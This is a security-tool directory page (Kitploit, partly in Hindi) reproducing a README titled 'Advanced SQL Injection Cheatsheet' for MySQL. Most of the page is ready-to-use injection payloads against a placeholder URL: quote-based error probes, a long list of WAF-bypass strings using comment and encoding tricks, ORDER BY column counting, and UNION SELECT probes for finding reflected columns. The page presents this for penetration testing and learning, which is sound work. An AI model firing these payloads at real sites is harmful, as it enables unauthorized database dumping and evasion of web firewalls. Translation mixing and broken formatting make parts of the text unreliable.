Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Advanced-SQL-Injection-Cheatsheet — एक चीट शीट जिसमें सभी प्रकार के SQL इंजेक्शन के लिए उन्नत क्वेरी शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/kleiton0x00/advanced-sql-injection-cheatsheet
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाचयनित संसाधन
GitHubkleiton0x00/advanced-sql-injection-cheatsheet

Advanced-SQL-Injection-Cheatsheet

एक चीट शीट जिसमें सभी प्रकार के SQL इंजेक्शन के लिए उन्नत क्वेरी शामिल हैं।

रिपॉजिटरी देखेंवेबसाइट
3.2k702233 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MySQL Error based SQL Injection Cheatsheet

यह शायद SQL Injection हमले के अंतर्गत सबसे आसान कमज़ोरी है। एक हमलावर अपने लाभ के लिए SQL त्रुटि संदेशों का उपयोग करके MySQL डेटाबेस को enumerate और dump कर सकता है।

कमज़ोरी का पता लगानाhttp://domain.com/index.php?id=1

Website loads successfully

http://domain.com/index.php?id=1'
त्रुटि संदेश दिखाई देता है: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...``````http://domain.com/index.php?id=1\'
Error message shows up: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...

http://domain.com/index.php?id=1 and 0' order by 1--+
वेबसाइट सफलतापूर्वक लोड होती हैhttp://domain.com/index.php?id=2-1
Website loads successfully

http://domain.com/index.php?id=-1'
त्रुटि संदेश फिर से दिखाई देता हैhttp://domain.com/index.php?id=-1)'
Error message shows up again

http://domain.com/index.php?id=1'-- -
वेबसाइट सफलतापूर्वक लोड हो सकती है, लेकिन इसमें त्रुटि भी दिख सकती है।http://domain.com/index.php?id=1'--
Website might loads successfuly, but it might shows error also

http://domain.com/index.php?id=1+--+
वेबसाइट सफलतापूर्वक लोड हो सकती है, लेकिन इसमें त्रुटि भी दिख सकती है

WAF को बायपास करके भेद्यता का पता लगाना (यदि पहली विधि काम नहीं की)

कुछ मामलों में, WAF आपको वेबसाइट पर त्रुटि उत्पन्न करने नहीं देगा, इसलिए WAF को बायपास करने के लिए विशेष क्वेरी भेजने की आवश्यकता हो सकती है।http://domain.com/index.php?id=1'--/**/-
If no WAF Warning is shown and website loads up, we confirm the vulnerability, else try the following payloads.

http//domain.com/index.php?id=/^.*1'--+-.*$/
http//domain.com/index.php?id=/*!500001'--+-*/
http//domain.com/index.php?id=1'--/**/-
http//domain.com/index.php?id=1'--/*--*/-
http//domain.com/index.php?id=1'--/*&a=*/-
http//domain.com/index.php?id=1'--/*1337*/-
http//domain.com/index.php?id=1'--/**_**/-
http//domain.com/index.php?id=1'--%0A-
http//domain.com/index.php?id=1'--%0b-
http//domain.com/index.php?id=1'--%0d%0A-
http//domain.com/index.php?id=1'--%23%0A-
http//domain.com/index.php?id=1'--%23foo%0D%0A-
http//domain.com/index.php?id=1'--%23foo*%2F*bar%0D%0A-
http//domain.com/index.php?id=1'--#qa%0A#%0A-
http//domain.com/index.php?id=/*!20000%0d%0a1'--+-*/
http//domain.com/index.php?id=/*!blobblobblob%0d%0a1'--+-*/

Find the number of columns using 'ORDER BY' query

Now that we performed an SQL syntax error to the website, we can begin fuzzing and finding how many columns do we have by using ORDER BY

http://domain.com/index.php?id=1' order by 1-- -
यह क्वेरी त्रुटि नहीं दिखानी चाहिए, क्योंकि 1 से कम कोई संख्या नहीं है

  • यदि payload त्रुटि दिखाता है, तो नकारात्मक मान सेट करने का प्रयास करें:http://domain.com/index.php?id=-1' order by 1-- -
    This query musn't shows up error, since there is no lower number than 1

    • If the payload shows up error, try removing the quote which might cause SQL error: http://domain.com/index.php?id=605 order by 1-- -
      http://domain.com/index.php?id=-605 order by 1-- -
      These both queries musn't shows up error. If error is still ocurring, try the following payloads:

      • If both of payloads don't work, it is problably a WAF blocking it. Try the following blocks until you won't see WAF detection or SQL syntax error.
http://domain.com/index.php?id=1' order by 1 desc-- -  
http://domain.com/index.php?id=1' group by 1-- -  
http://domain.com/index.php?id=1' group by 1-- -  
http://domain.com/index.php?id=1' /**/ORDER/**/BY/**/ 1-- -  
http://domain.com/index.php?id=-1' /*!order*/+/*!by*/ 1-- -  
http://domain.com/index.php?id=1' /*!ORDER BY*/ 1-- -  
http://domain.com/index.php?id=1'/*!50000ORDER*//**//*!50000BY*/ 1-- -  
http://domain.com/index.php?id=1' /*!12345ORDER*/+/*!BY*/ 1-- -  
http://domain.com/index.php?id=1' /*!50000ORDER BY*/ 1-- -  
http://domain.com/index.php?id=1' order/**_**/by 1-- -  
http://domain.com/index.php?id=1\ order by 1-- -  
http://domain.com/index.php?id=1' order by 1 asc-- -  
http://domain.com/index.php?id=1' group by 1 asc-- -  
http://domain.com/index.php?id=1' AND 0 order by 1-- -  
http://domain.com/index.php?id=1%0Aorder%0Aby%0A1-- -  
http://domain.com/index.php?id=1%23%0Aorder%23%0Aby%23%0A1-- -  
http://domain.com/index.php?id=1%23aa%0Aorder%23aa%0Aby%23aa%0A1-- -  
http://domain.com/index.php?id=1%23xyz%0Aorder%23xyz%0Aby%23xyz%0A1-- -  
http://domain.com/index.php?id=1%23foo%0D%0Aorder%23foo%0D%0Aby%23foo%0D%0A1-- -  
http://domain.com/index.php?id=1%23foo*%2F*bar%0D%0Aorder%23foo*%2F*bar%0D%0Aby%23foo*%2F*bar%0D%0A1-- -  
http://domain.com/index.php?id=1/*!20000%0d%0a+order+by+*/1-- -  
http://domain.com/index.php?id=1/*!blobblobblob%0d%0a+order+by+*/1-- -  
http://domain.com/index.php?id=1/*!f****U%0d%0a+order+by+*/1-- -```

    
    - If none of the payloads didn't bypass WAF, try again the payloads by following the 2 rules below:
      - Add a minus (-) before 1 (example: ```?id=-1' /**/ORDER/**/BY/**/ 1-- -```)  
      - Remove the quote (') after the parameter value (example: ```?id=1 /**/ORDER/**/BY/**/ 1-- -```)

In this case, the payload ```?id=1 order by 1-- -``` worked and website loads successfuly. Now it is time to find the correct number of columns. Now let's use the payload that worked, and try increasing the number by 1, untill an error shows up: 

```http://domain.com/index.php?id=1 order by 1-- -``` no error  
```http://domain.com/index.php?id=1 order by 2-- -```  no error  
```http://domain.com/index.php?id=1 order by 3-- -```  no error  
```http://domain.com/index.php?id=1 order by 4-- -```  no error  
```http://domain.com/index.php?id=1 order by 5-- -```  error:   
```Unknown column '5' in 'order clause'Unknown column '5' in 'order clause'```  

This means there are only 4 columns. Now we have to find which one of these 4 columns have information.  

## Find the vulnerable column where information are stored using 'UNION SELECT' query  

Using a simple query, we determine which of the 4 columns reflect our input using. Only 1 of these payloads will run without **syntax error**. *NOTE: If none worked, try the same payloads, but remove the quote (') after number 1.*    

```http://domain.com/index.php?id=1' Union Select 1,2,3,4-- -```  
```http://domain.com/index.php?id=-1 Union Select 1,2,3,4-- -```  
```http://domain.com/index.php?id=-1' Union Select 1,2,3,4-- -```  
```http://domain.com/index.php?id=1'+UNION+ALL+SELECT+null,null,null,null--+-```  
```http://domain.com/index.php?id=1' Union Select null,2,3,4-- -```  
```http://domain.com/index.php?id=1' Union Select 1,null,3,4-- -```  
```http://domain.com/index.php?id=1' Union Select 1,2,null,4-- -```  
```http://domain.com/index.php?id=1' Union Select 1,2,3,null-- -```  
```http://domain.com/index.php?id=.1' Union Select 1,2,3,4-- -```  
```http://domain.com/index.php?id=-1' div 0' Union Select 1,2,3,4-- -```  
```http://domain.com/index.php?id=1' Union Select 1,2,3,4 desc-- -```  
```http://domain.com/index.php?id=1' AND 0 Union Select 1,2,3,4-- -```  

Website must successfully load and we will see a number (in our case between 1-4)  

![union_select_vuln_column](https://assets.kitploit.com/production/public/readmes/48038/e8504dde8dd18d24ef2a6b43ee9a21b4f5e7eca04eda6ef11834a0811e884956.png)
टूल डाउनलोड करें